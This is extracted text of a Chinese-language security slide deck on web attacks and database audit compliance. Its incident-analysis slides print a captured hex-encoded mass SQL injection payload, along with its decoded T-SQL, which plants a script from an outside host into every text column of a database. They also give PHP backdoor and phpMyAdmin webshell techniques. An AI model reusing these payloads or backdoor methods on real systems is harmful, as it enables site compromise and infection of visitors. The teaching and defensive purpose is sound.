数据库安全审计课件

1、Web Application Security and Database Audit MiscsDBAPPSecurity Inc杭州安恒信息技术有限公司FrankdbappSFrank.Fan主讲人Frank.Fan范渊杭州安恒信息技术有限公司DBAPPSecurity IncFounder and CTO毕业于美国加州大学计算机科学方向硅谷国际著名安全公司从事十多年的技术研发和项目管理对应用安全、数据库安全和审计、compliance(如SOX, PCI, ISO17799/27001)有着非常资深经验第一个登上全球最权威黑帽子安全大会演讲的中国人CISSP, CISA, GCIH, G

2、CIAOWASP中国分会副会长2008北京奥组委安全组成员浙江省信息安全协会安全服务委员会负责人本期要点： Web应用安全挑战和分析数据库审计 安全风险+管理风险 -审计主要内容公司简介数据库安全审计概念各类规范要求和数据库审计系统需求分析明御数据库审计与风险控制系统案例分析小结2008北京奥组委安全产品和服务提供商作为2008北京奥组委安全产品和服务提供商，2008年9月安恒信息被2008北京奥运会组委会授予08奥运安全保障杰出贡献奖。 Many Incident Handling Support安恒机密. | 7黑客产业链入侵者入侵企业服务器窃取机密信息(图纸、财务报表等）出售收费传播流氓

3、软件获取金钱拒绝服务攻击发送垃圾邮件批量入侵网站盗取银行帐号盗取信用卡帐号盗取证券交易帐号盗取虚拟财产组建僵尸网络洗钱主动攻击勒索网站受雇攻击收取佣金安恒机密. | 8总共检测网站近700家90%网站存在严重安全隐患部分网站已经被挂马或被黑客控制AgendaMass Injection Attack Tool RevealedPHP Backdoor TipsSome hacking tips about phpmydamin9Mass Injection Tool RevealedHow did We find it? From a Bot Machine during Incident H

4、andling10Real case in incident handling!2008-05-13 00:28:25 W3SVC628249937 1 POST /news_default.asp tid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760061007200630068006100720028003200350

5、03500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C00730

6、07900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F0

7、07200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F00430075007200730

8、06F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B004000430

9、02B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F00670

10、02E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F00430

11、07500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);- 80 - 23 Mozilla/3.0+(compatible;+Indy+Library) 200 0 011Real contentDECLARE T varchar(255),C varchar(255) DECLARE Table_Cursor CURSOR FOR select , fro

12、m sysobjects a,syscolumns b where a.id=b.id and a.xtype=u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO T,C WHILE(FETCH_STATUS=0) BEGIN exec(update +T+ set +C+=rtrim(convert(varchar,+C+)+)FETCH NEXT FROM Table_Cursor INTO T,C END CLO

13、SE Table_Cursor DEALLOCATE Table_Cursor12Key part:13Mass Injection Tool Revealed14Mass Injection Tool Revealed15Mass Injection Tool - Config.iniinitedkey=inurl:(.aspx? -(gov) 自动产生ranklimit=1000000cipin=50timeout=20process=1retry=3thread=88bufferlength=10cpu=115sellang=0scanmode=0chkbox1=1chkbox2=0ch

14、kbox3=1chkbox4=0chkbox5=1chkbox6=0chkbufferlength=1chkranklimit=0IgnoreUrl=#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$AIgnoreKey=Not Found#$D#$A盗链#$D#$A文件不存在#$D#$A16PHP backdoor Basename()Include()Eval()Preg_replace()1718Basename()?php$fp = fopen(c:/test

15、.php, w);fwrite($fp, basename($_SERVERQUERY_STRING);fclose($fp);/Basename.php? 19Include()Modify configuration filephp.ini.htaccess 20Update php.ini21Update .htaccess文件.htaccess #php_value auto_prepend_file .htaccess22Some hacking tips about phpmydamin1. Get phpmyadmins absolute path(Multi version s

16、upport)2. Inference Variable info(mysql related)3、Package (default stuff)4、Error info inference5、phpinfo Enable6、Injection7、Get webshellGet phpmyadmins absolute pathhttp:/xx/phpmyadmin/themes/darkblue_orange/layout.inc.phphttp:/xx/phpMyAdmin/index.php?lang=1http:/xx/phpmyadmin/libraries/select_lang.

17、lib.phphttp:/xx/phpmyadmin/scripts/check_lang.phphttp:/xx/phpmyadmin/libraries/export/xls.php三、PackageAPMServ C:APM_SetupServerphpMyAdminAppServ C:AppServwwwphpMyAdminXAMPP C:xamppphpMyAdmin.七、Get WebshellUse dumpfile to get webshellReal Case used some code hardeningReal Case Cookie InjectionDefense

18、 TipsWeb Application Firewall ChallengeCode and Configuration hardening Challenge30Web Application Firewall (WAF) 历史Web应用防火墙第一代： 流方式Web应用防火墙第二代：第二代Web应用防火墙支持全透明直连部署HTTPS全透明支持Web加速功能抗各类Web攻击第二部分：数据库审计概念审计信息安全审计数据库审计审计检查、验证目标的准确性和完整性，用以防止虚假数据和欺骗行为，以及是否符合既定的标准、标竿和其它审计原则萨班斯法案美国史上最严厉的审计法则企业内部控制规范国内审计规范，主

19、要目的在于加强和规 范企业内部控制，提高企业经营管理水平和风险行为防范能力财务审计、IT审计信息安全审计信息安全审计收集并评估证据以决定一个计算机系统是否有效做到保护资产、维护数据完整、完成目标，同时最经济的使用资源萨班斯法案强调加强与财务报表相关的IT系统内部控制，其中，IT系统内部控制是紧密围绕信息安全审计这一核心的。巴赛尔新资本协定(Basel II)，要求全球银行必须做好风险控管(risk management)，而这项“金融作业风险”的防范正需要业务信息安全审计为依托。企业内部控制具体规范明确要求计算机信息系统应采取权责分配及职责分工、建立访问安全策略等审计措施以加强提高信息系统的可

20、靠性、稳定性、安全性及数据的完整性和准确性。ISO17799、CC、PCI数据库安全审计确保数据的完整性数据库安全审计，通过对数据库安全性相关的操作进行审计，监测指定用户的行为，掌握数据库使用状况。数据库审计是信息安全审计的重要组成部分。数据库审计的目的在于确保数据的完整性全面了解数据库实际发生的情况可疑行为发生时可以自动启动预先设置的告警流程，防范数据库风险的发生第三部分：数据库审计系统需求分析安全需求分析数据库安全攻击事件正在升级数据库安全分析现有安全解决方案无法有效应对数据库攻击行为相关法律法规数据库审计系统应满足的要求数据库安全攻击事件某系统开发工程师通过互联网入侵移动中心数据库，盗取

21、冲值卡某医院数据库系统遭到非法入侵，导致上万名患者私隐信息被盗取某网游公司内部数据库管理人员通过违规修改数据库数据盗窃网游点卡黑客利用SQL注入攻击，入侵某防病毒软件数据库中心，窃取大量机密信息，导致该防病毒软件公司严重损失某证券交易所内部数据库造黑客股民入侵，盗窃证券交易内部报告针对数据库进行的安全攻击事件正在升级！数据库审计系统需求分析安全需求分析数据库安全分析数据库的重要性是企业数据信息的最终载体是企业业务系统的核心自然灾难软件崩溃 重装/升级/补丁人为错误硬件和系统错误 异地容灾/恢复 回滚/恢复 RAID/备份恶意攻击 ?数据库面临的风险内部人员误操作、违规操作、越权操作第三方维护人

22、员安全隐患最高权限用户操作多人共用一个帐号员工离职后泄漏公司信息管理风险技术风险网络层攻击操作系统漏洞应用程序攻击数据库攻击应用提供商的后门离职员工的后门审计风险日志缺失或不完整安全事件难于追溯或定位复杂的业务应用 + 异构的网络环境 + 高度集中的信息共享使企业核心数据库面临更大的安全挑战现有的安全解决方案应用前端交换机防火墙路由器2/3层交换机Web服务器网络存储应用服务器数据库服务器因特网IDS/IPS防病毒工具软件防火墙漏洞扫描软件PKI/SSO重要应用部署于防火墙内只开放需要的端口限制特殊的源地址网络监听入侵检测告警现有的安全解决方案不能有效应对防火墙只能检测网络层的攻击无法阻拦来自

23、网络内部的非法操作无法动态识别或自适应地调整规则对WEB应用,端口80或443必须开放IDS/IPS只检测已知特征对数据层的信息缺乏深度分析，误报/漏报率很高没有对session/user的跟踪；不能保护SSL流量针对网络层应用层攻击内部违规操作现有的网络安全防护对内部人员的违规操作无能为力普通防火墙+ IDS/IPS 束手无策由于数据库本身的重要性以及脆弱性，国家以及国际上都制定了相关的法律法规来指导并规范数据库信息系统的安全建设其中最重要的是明确了独立数据库审计系统的必要性和重要性数据库审计系统需求分析相关法律法规信息安全等级保护测评准则信息安全等级保护测评准则第六章“第二级安全控制测评”

24、中第一节“安全技术测评”主机系统安全审计中明确提出：安全审计应覆盖到服务器上的每个操作系统用户和数据库用户安全审计应记录系统内重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统命令的使用等安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、事件的结果等审计记录应受到保护避免受到未预期的删除、修改或覆盖等信息安全等级保护测评准则第七章“第三级安全控制测评”中第一节“安全技术测评”主机系统安全审计中明确提出：安全审计应覆盖到应用系统的每个操作系统用户和数据库用户安全审计应记录应用系统重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统功能的执行等安全相关事件

25、的记录应包括日期和时间、类型、主体标识、客体标识、事件的结果等安全审计应可以根据记录数据进行分析，并生成审计报表安全审计应可以对特定事件，提供指定方式的实时报警审计进程应受到保护避免受到未预期的中断审计记录应受到保护避免受到未预期的删除、修改或覆盖等信息安全等级保护测评准则第七章“第四级安全控制测评”中第一节“安全技术测评”主机系统安全审计中明确提出：安全审计应覆盖到服务器和客户端上的所有操作系统用户和数据库用户安全审计应记录系统内重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统命令的使用安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、客体敏感标记、事件的结果等

26、安全审计应可以根据记录数据进行分析，并生成审计报表安全审计应可以对特定事件，提供指定方式的实时报警审计进程应受到保护避免受到未预期的中断审计记录应受到保护避免受到未预期的删除、修改或覆盖等安全审计应能跟踪监测到可能的安全侵害事件，并终止违规进程安全审计应根据信息系统的统一安全策略，实现集中审计系统设备时钟应与时钟服务器时钟保持同步等级保护数据库管理技术要求计算机信息系统安全等级保护数据库管理技术要求第四章“数据库管理系统安全技术要求”中第四节“数据库安全审计”中明确提出数据库管理系统的安全审计应：建立独立的安全审计系统定义与数据库安全相关的审计事件设置专门的安全审计员设置专门用于存储数据库系统

27、审计数据的安全审计库提供适用于数据库系统的安全审计设置、分析和查阅的工具ISO 体系BS7799/ISO27001BS7799-1（ISO）1999信息技术信息安全管理业务规范第十章“系统开发与维护”中第二节“应用系统中的安全”明确提出：为“防止应用系统中用户数据的丢失、修改或滥用”，“应用系统应设计包含适当的控制措施和审计追踪或活动日志记录，包括在用户写入的应用程序中。这些系统应包括对输入数据、内部处理和输出数据的检验功能。”BS7799-2 2002 信息技术信息安全管理系统规范第四章“详细监控”中第七节“访问控制”第7小节“监控对系统的访问和使用”明确提出：为实现“探测未经授权的行为”的

28、目标，“应提供对异常事件和与安全相关事件的审计日志”。ISO15408ISO15408-2 安全功能要求明确要求数据库安全审计应包括： 识别、记录、存储和分析那些与安全相关活动（即由TSP 控制的活动）有关的信息。检查审计记录结果可用来判断发生了哪些安全相关活动以及哪个用户要对这些活动负责。支付卡行业数据安全标准（PCI）PCI验证访问任何数据库（其中包括持卡人数据）的所有操作。这包括应用程序、管理员和所有其他用户的访问操作。8.5.16.a 检查数据库和应用程序配置设置，以确定用户身份认证和数据库的访问包括以下内容：所有用户在访问前必须进行身份认证所有的用户访问数据库、查询数据库和操作数据库

29、（例如移动、复制、删除）行为必须只能通过编程方法（例如，通过存储的程序）只有数据库管理员才能直接访问数据库或查询数据库。8.5.16.b 检查数据库应用程序和相关应用程序 ID，以确定应用程序 ID 仅限应用程序（而不是个人用户或其他流程）使用。期货公司信息技术管理指引 期货公司信息技术管理指引第二章“一级信息技术管理指引”第四节“信息安全”中明确指出“安全审计”应满足：核心业务系统的主要业务操作应产生审计记录，包括时间、发起者、类型、描述和结果等信息。 应采取有效措施防止删除、修改或覆盖审计记录第三章“二级信息技术管理指引”、第四章“三级信息技术管理指引”以及“四级信息技术管理指引”中都有相应的内容明确“安全审计”的相关内容综述综上所述：一个完善数据库审计系统是数据库信息系统的安全建设必不可缺的同时，一个完善的数据库审计系统应满足以下要求：数据库审计系统应满足的具体要求捕捉数据访问捕捉数据库配置变化安全告警审计策略的配置和管理审计记录管理和查询最低风险值数据库审计系统具体要求独立审计日志报告生成第四部分：数据库审计的挑战以及明御数据库审计与风险控制系统数据库审计的挑战案例分析挑战之一：数据库自身审计的矛盾和缺